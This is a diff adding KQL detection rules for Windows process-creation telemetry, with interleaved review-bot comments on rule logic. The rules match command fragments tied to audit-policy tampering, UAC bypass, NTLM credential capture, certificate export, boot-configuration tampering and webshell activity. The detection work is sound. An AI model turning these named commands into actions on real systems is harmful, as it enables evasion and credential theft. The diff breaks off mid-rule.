+| where ProcessCommandLine contains "/FILE" and FolderPath endswith "\\SoundRecorder.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/audit_policy_tampering_via_auditpol.kql b/KQL/rules/windows/process_creation/audit_policy_tampering_via_auditpol.kql
new file mode 100644
index 00000000..2928004b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/audit_policy_tampering_via_auditpol.kql
@@ -0,0 +1,13 @@
+// Title: Audit Policy Tampering Via Auditpol
+// Author: Janantha Marasinghe (https://github.com/blueteam0ps)
+// Date: 2021-02-02
+// Level: high
+// Description: Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.
+// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+// False Positives:
+// - Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "disable" or ProcessCommandLine contains "clear" or ProcessCommandLine contains "remove" or ProcessCommandLine contains "restore") and (FolderPath endswith "\\auditpol.exe" or ProcessVersionInfoOriginalFileName =~ "AUDITPOL.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/audit_policy_tampering_via_nt_resource_kit_auditpol.kql b/KQL/rules/windows/process_creation/audit_policy_tampering_via_nt_resource_kit_auditpol.kql
new file mode 100644
index 00000000..75a6e4f2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/audit_policy_tampering_via_nt_resource_kit_auditpol.kql
@@ -0,0 +1,13 @@
+// Title: Audit Policy Tampering Via NT Resource Kit Auditpol
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-18
+// Level: high
+// Description: Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
+// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+// False Positives:
+// - The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/logon:none" or ProcessCommandLine contains "/system:none" or ProcessCommandLine contains "/sam:none" or ProcessCommandLine contains "/privilege:none" or ProcessCommandLine contains "/object:none" or ProcessCommandLine contains "/process:none" or ProcessCommandLine contains "/policy:none"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/automated_collection_command_prompt.kql b/KQL/rules/windows/process_creation/automated_collection_command_prompt.kql
new file mode 100644
index 00000000..60b39179
--- /dev/null
+++ b/KQL/rules/windows/process_creation/automated_collection_command_prompt.kql
@@ -0,0 +1,10 @@
+// Title: Automated Collection Command Prompt
+// Author: frack113
+// Date: 2021-07-28
+// Level: medium
+// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1119, attack.credential-access, attack.t1552.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".docx" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xlsx" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".pptx" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".txt") and ((ProcessCommandLine contains "dir " and ProcessCommandLine contains " /b " and ProcessCommandLine contains " /s ") or ((ProcessCommandLine contains " /e " or ProcessCommandLine contains " /si ") and ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql b/KQL/rules/windows/process_creation/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql
new file mode 100644
index 00000000..39c09b7d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql
@@ -0,0 +1,12 @@
+// Title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "winrm" and ((ProcessCommandLine contains "format:pretty" or ProcessCommandLine contains "format:\"pretty\"" or ProcessCommandLine contains "format:\"text\"" or ProcessCommandLine contains "format:text") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql b/KQL/rules/windows/process_creation/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql
new file mode 100644
index 00000000..f158ee74
--- /dev/null
+++ b/KQL/rules/windows/process_creation/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql
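Review bot: The exclusion `not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))` on the last line hard-codes the system drive, so on a host whose Windows directory is not on C: the legitimate cscript.exe invocation of winrm.vbs is no longer filtered out and the rule fires on every such call. The aspnet_compiler rule in this same batch already uses the drive-agnostic form `FolderPath contains ":\\Windows\\Microsoft.NET\\..."`; the same shape works here, `not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\"))`, and keeps the copied-to-another-folder cscript.exe detection intact. Since these files are regenerated weekly, this is better carried as a converter path-normalisation than as a hand edit.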
@@ -0,0 +1,14 @@
+// Title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
+// Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
+// Date: 2020-10-23
+// Level: high
+// Description: Detects attackers using tooling with bad opsec defaults.
+// E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.
+// One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine endswith "regasm.exe" and FolderPath endswith "\\regasm.exe") or (ProcessCommandLine endswith "regsvcs.exe" and FolderPath endswith "\\regsvcs.exe") or (ProcessCommandLine endswith "regsvr32.exe" and FolderPath endswith "\\regsvr32.exe") or (ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe") or (ProcessCommandLine endswith "WerFault.exe" and FolderPath endswith "\\WerFault.exe")) and (not(((ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "--uninstall " and (InitiatingProcessFolderPath contains "\\AppData\\Local\\BraveSoftware\\Brave-Browser\\Application\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Google\\Chrome\\Application\\") and InitiatingProcessFolderPath endswith "\\Installer\\setup.exe") or (ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{"))))
\ No newline at end of file
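Review bot: Each `ProcessCommandLine endswith "rundll32.exe"` style check on the last line misses the case where the launching tool quotes the image path, because a command line such as `"C:\Windows\System32\rundll32.exe"` ends in a double quote rather than the binary name, and a quoted path with no arguments is exactly the sacrificial-process pattern this rule targets. The dotnet rule in this same batch already pairs each suffix with its quoted twin (`endswith ".dll\""`); the same shape works here, e.g. `((ProcessCommandLine endswith "rundll32.exe" or ProcessCommandLine endswith "rundll32.exe\"") and FolderPath endswith "\\rundll32.exe")`, repeated for the other four binaries. The two rundll32 branches inside the `not(...)` exclusion need the same pair, otherwise the quoted Chrome/Edge installer launches would start alerting.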
diff --git a/KQL/rules/windows/process_creation/base64_encoded_powershell_command_detected.kql b/KQL/rules/windows/process_creation/base64_encoded_powershell_command_detected.kql
new file mode 100644
index 00000000..4cea30cb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/base64_encoded_powershell_command_detected.kql
@@ -0,0 +1,12 @@
+// Title: Base64 Encoded PowerShell Command Detected
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-01-29
+// Level: high
+// Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1027, attack.defense-evasion, attack.execution, attack.t1140, attack.t1059.001
+// False Positives:
+// - Administrative script libraries
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "::FromBase64String("
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/base64_mz_header_in_commandline.kql b/KQL/rules/windows/process_creation/base64_mz_header_in_commandline.kql
new file mode 100644
index 00000000..cb703139
--- /dev/null
+++ b/KQL/rules/windows/process_creation/base64_mz_header_in_commandline.kql
@@ -0,0 +1,12 @@
+// Title: Base64 MZ Header In CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-12
+// Level: high
+// Description: Detects encoded base64 MZ header in the commandline
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "TVqQAAMAAAAEAAAA" or ProcessCommandLine contains "TVpQAAIAAAAEAA8A" or ProcessCommandLine contains "TVqAAAEAAAAEABAA" or ProcessCommandLine contains "TVoAAAAAAAAAAAAA" or ProcessCommandLine contains "TVpTAQEAAAAEAAAA"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/binary_proxy_execution_via_dotnet_trace_exe.kql b/KQL/rules/windows/process_creation/binary_proxy_execution_via_dotnet_trace_exe.kql
new file mode 100644
index 00000000..e40790aa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/binary_proxy_execution_via_dotnet_trace_exe.kql
@@ -0,0 +1,12 @@
+// Title: Binary Proxy Execution Via Dotnet-Trace.EXE
+// Author: Jimmy Bayne (@bohops)
+// Date: 2024-01-02
+// Level: medium
+// Description: Detects commandline arguments for executing a child process via dotnet-trace.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage of the utility in order to debug and trace a program.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-- " and ProcessCommandLine contains "collect") and (FolderPath endswith "\\dotnet-trace.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-trace.dll")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/bitlockertogo_exe_execution.kql b/KQL/rules/windows/process_creation/bitlockertogo_exe_execution.kql
new file mode 100644
index 00000000..ab552535
--- /dev/null
+++ b/KQL/rules/windows/process_creation/bitlockertogo_exe_execution.kql
@@ -0,0 +1,15 @@
+// Title: BitLockerTogo.EXE Execution
+// Author: Josh Nickels, mttaggart
+// Date: 2024-07-11
+// Level: low
+// Description: Detects the execution of "BitLockerToGo.EXE".
+// BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system.
+// This is a rarely used application and usage of it at all is worth investigating.
+// Malware such as Lumma stealer has been seen using this process as a target for process hollowing.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage of BitLockerToGo.exe to encrypt portable devices.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\BitLockerToGo.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/boot_configuration_tampering_via_bcdedit_exe.kql b/KQL/rules/windows/process_creation/boot_configuration_tampering_via_bcdedit_exe.kql
new file mode 100644
index 00000000..6dd33a8b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/boot_configuration_tampering_via_bcdedit_exe.kql
@@ -0,0 +1,12 @@
+// Title: Boot Configuration Tampering Via Bcdedit.EXE
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "bootstatuspolicy" and ProcessCommandLine contains "ignoreallfailures") or (ProcessCommandLine contains "recoveryenabled" and ProcessCommandLine contains "no")) and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe") and ProcessCommandLine contains "set"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/browser_execution_in_headless_mode.kql b/KQL/rules/windows/process_creation/browser_execution_in_headless_mode.kql
new file mode 100644
index 00000000..1d465f67
--- /dev/null
+++ b/KQL/rules/windows/process_creation/browser_execution_in_headless_mode.kql
@@ -0,0 +1,10 @@
+// Title: Browser Execution In Headless Mode
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-12
+// Level: low
+// Description: Detects execution of Chromium based browser in headless mode
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105, attack.t1564.003
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--headless" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/browser_started_with_remote_debugging.kql b/KQL/rules/windows/process_creation/browser_started_with_remote_debugging.kql
new file mode 100644
index 00000000..3470364b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/browser_started_with_remote_debugging.kql
@@ -0,0 +1,10 @@
+// Title: Browser Started with Remote Debugging
+// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-27
+// Level: medium
+// Description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.collection, attack.t1185
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " --remote-debugging-" or (ProcessCommandLine contains " -start-debugger-server" and FolderPath endswith "\\firefox.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/bypass_uac_via_cmstp.kql b/KQL/rules/windows/process_creation/bypass_uac_via_cmstp.kql
new file mode 100644
index 00000000..9f088b8a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/bypass_uac_via_cmstp.kql
@@ -0,0 +1,12 @@
+// Title: Bypass UAC via CMSTP
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002, attack.t1218.003
+// False Positives:
+// - Legitimate use of cmstp.exe utility by legitimate user
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "-s" or ProcessCommandLine contains "/au" or ProcessCommandLine contains "-au" or ProcessCommandLine contains "/ni" or ProcessCommandLine contains "-ni") and (FolderPath endswith "\\cmstp.exe" or ProcessVersionInfoOriginalFileName =~ "CMSTP.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/bypass_uac_via_fodhelper_exe.kql b/KQL/rules/windows/process_creation/bypass_uac_via_fodhelper_exe.kql
new file mode 100644
index 00000000..d66ad7d9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/bypass_uac_via_fodhelper_exe.kql
@@ -0,0 +1,12 @@
+// Title: Bypass UAC via Fodhelper.exe
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+// False Positives:
+// - Legitimate use of fodhelper.exe utility by legitimate user
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\fodhelper.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/bypass_uac_via_wsreset_exe.kql b/KQL/rules/windows/process_creation/bypass_uac_via_wsreset_exe.kql
new file mode 100644
index 00000000..5f35acbd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/bypass_uac_via_wsreset_exe.kql
@@ -0,0 +1,12 @@
+// Title: Bypass UAC via WSReset.exe
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth
+// Date: 2019-10-24
+// Level: high
+// Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+// False Positives:
+// - Unknown sub processes of Wsreset.exe
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\wsreset.exe" and (not((FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/c_il_code_compilation_via_ilasm_exe.kql b/KQL/rules/windows/process_creation/c_il_code_compilation_via_ilasm_exe.kql
new file mode 100644
index 00000000..9d20434b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/c_il_code_compilation_via_ilasm_exe.kql
@@ -0,0 +1,10 @@
+// Title: C# IL Code Compilation Via Ilasm.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-07
+// Level: medium
+// Description: Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /dll" or ProcessCommandLine contains " /exe") and (FolderPath endswith "\\ilasm.exe" or ProcessVersionInfoOriginalFileName =~ "ilasm.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql b/KQL/rules/windows/process_creation/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql
new file mode 100644
index 00000000..9c770818
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql
@@ -0,0 +1,10 @@
+// Title: Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Appdata\\Local\\Temp\\") and (ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/capture_credentials_with_rpcping_exe.kql b/KQL/rules/windows/process_creation/capture_credentials_with_rpcping_exe.kql
new file mode 100644
index 00000000..093675d4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/capture_credentials_with_rpcping_exe.kql
@@ -0,0 +1,12 @@
+// Title: Capture Credentials with Rpcping.exe
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-s" or ProcessCommandLine contains "/s" or ProcessCommandLine contains "–s" or ProcessCommandLine contains "—s" or ProcessCommandLine contains "―s") and (FolderPath endswith "\\RpcPing.exe" or ProcessVersionInfoOriginalFileName =~ "\\RpcPing.exe")) and ((ProcessCommandLine contains "ncacn_np" and (ProcessCommandLine contains "-t" or ProcessCommandLine contains "/t" or ProcessCommandLine contains "–t" or ProcessCommandLine contains "—t" or ProcessCommandLine contains "―t")) or (ProcessCommandLine contains "NTLM" and (ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u" or ProcessCommandLine contains "–u" or ProcessCommandLine contains "—u" or ProcessCommandLine contains "―u")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/certificate_exported_via_certutil_exe.kql b/KQL/rules/windows/process_creation/certificate_exported_via_certutil_exe.kql
new file mode 100644
index 00000000..21202da4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/certificate_exported_via_certutil_exe.kql
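Review bot: The OriginalFileName branch of the rpcping image selection can never match: `ProcessVersionInfoOriginalFileName =~ "\\RpcPing.exe"` compares against a value with a leading backslash, while every other rule in this batch compares that field against a bare file name (`=~ "bcdedit.exe"`, `=~ "CMSTP.EXE"`, `=~ "CertUtil.exe"`), so only the `FolderPath endswith` branch is effective and a renamed binary that keeps its original name slips through. This looks like a path-style value (`\RpcPing.exe`) being carried into an equality comparison during conversion. Change it to `ProcessVersionInfoOriginalFileName =~ "RpcPing.exe"`. Since these files are produced by the converter, the fix probably belongs in the converter's handling of OriginalFileName values as well, or it will reappear on the next scheduled run.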
@@ -0,0 +1,12 @@
+// Title: Certificate Exported Via Certutil.EXE
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: medium
+// Description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+// False Positives:
+// - There legitimate reasons to export certificates. Investigate the activity to determine if it's benign
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-exportPFX " or ProcessCommandLine contains "/exportPFX " or ProcessCommandLine contains "–exportPFX " or ProcessCommandLine contains "—exportPFX " or ProcessCommandLine contains "―exportPFX ") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/certificate_exported_via_powershell.kql b/KQL/rules/windows/process_creation/certificate_exported_via_powershell.kql
new file mode 100644
index 00000000..a90f4a67
--- /dev/null
+++ b/KQL/rules/windows/process_creation/certificate_exported_via_powershell.kql
@@ -0,0 +1,12 @@
+// Title: Certificate Exported Via PowerShell
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-18
+// Level: medium
+// Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.execution, attack.t1552.004, attack.t1059.001
+// False Positives:
+// - Legitimate certificate exports by administrators. Additional filters might be required.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Export-PfxCertificate " or ProcessCommandLine contains "Export-Certificate "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/change_default_file_association_to_executable_via_assoc.kql b/KQL/rules/windows/process_creation/change_default_file_association_to_executable_via_assoc.kql
new file mode 100644
index 00000000..deff9744
--- /dev/null
+++ b/KQL/rules/windows/process_creation/change_default_file_association_to_executable_via_assoc.kql
@@ -0,0 +1,11 @@
+// Title: Change Default File Association To Executable Via Assoc
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects when a program changes the default file association of any extension to an executable.
+// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "assoc " and ProcessCommandLine contains "exefile") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) and (not(ProcessCommandLine contains ".exe=exefile"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/change_default_file_association_via_assoc.kql b/KQL/rules/windows/process_creation/change_default_file_association_via_assoc.kql
new file mode 100644
index 00000000..337598da
--- /dev/null
+++ b/KQL/rules/windows/process_creation/change_default_file_association_via_assoc.kql
@@ -0,0 +1,13 @@
+// Title: Change Default File Association Via Assoc
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2019-10-21
+// Level: low
+// Description: Detects file association changes using the builtin "assoc" command.
+// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001
+// False Positives:
+// - Admin activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "assoc" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/change_powershell_policies_to_an_insecure_level.kql b/KQL/rules/windows/process_creation/change_powershell_policies_to_an_insecure_level.kql
new file mode 100644
index 00000000..2e574132
--- /dev/null
+++ b/KQL/rules/windows/process_creation/change_powershell_policies_to_an_insecure_level.kql
@@ -0,0 +1,12 @@
+// Title: Change PowerShell Policies to an Insecure Level
+// Author: frack113
+// Date: 2021-11-01
+// Level: medium
+// Description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Administrator scripts
+
+DeviceProcessEvents
+| where (((ProcessVersionInfoOriginalFileName in~ ("powershell_ise.exe", "PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "Unrestricted") and (ProcessCommandLine contains "-executionpolicy " or ProcessCommandLine contains " -ep " or ProcessCommandLine contains " -exec ")) and (not(((ProcessCommandLine contains "-NoProfile -ExecutionPolicy Bypass -File \"C:\\Program Files\\PowerShell\\7\\" or ProcessCommandLine contains "-NoProfile -ExecutionPolicy Bypass -File \"C:\\Program Files (x86)\\PowerShell\\7\\") and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe"))))) and (not(((ProcessCommandLine contains "-ExecutionPolicy ByPass -File \"C:\\Program Files\\Avast Software\\Avast" or ProcessCommandLine contains "-ExecutionPolicy ByPass -File \"C:\\Program Files (x86)\\Avast Software\\Avast\\") and (InitiatingProcessFolderPath contains "C:\\Program Files\\Avast Software\\Avast\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Avast Software\\Avast\\" or InitiatingProcessFolderPath contains "\\instup.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/changing_existing_service_imagepath_value_via_reg_exe.kql b/KQL/rules/windows/process_creation/changing_existing_service_imagepath_value_via_reg_exe.kql
new file mode 100644
index 00000000..d31c066e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/changing_existing_service_imagepath_value_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: Changing Existing Service ImagePath Value Via Reg.EXE
+// Author: frack113
+// Date: 2021-12-30
+// Level: medium
+// Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
+// Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.
+// Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.011
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "add " and ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Services\\" and ProcessCommandLine contains " ImagePath ") and FolderPath endswith "\\reg.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " /d " or ProcessCommandLine contains " –d " or ProcessCommandLine contains " —d " or ProcessCommandLine contains " ―d ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/chopper_webshell_process_pattern.kql b/KQL/rules/windows/process_creation/chopper_webshell_process_pattern.kql
new file mode 100644
index 00000000..a9c4a33c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/chopper_webshell_process_pattern.kql
@@ -0,0 +1,10 @@
+// Title: Chopper Webshell Process Pattern
+// Author: Florian Roth (Nextron Systems), MSTI (query)
+// Date: 2022-10-01
+// Level: high
+// Description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
+
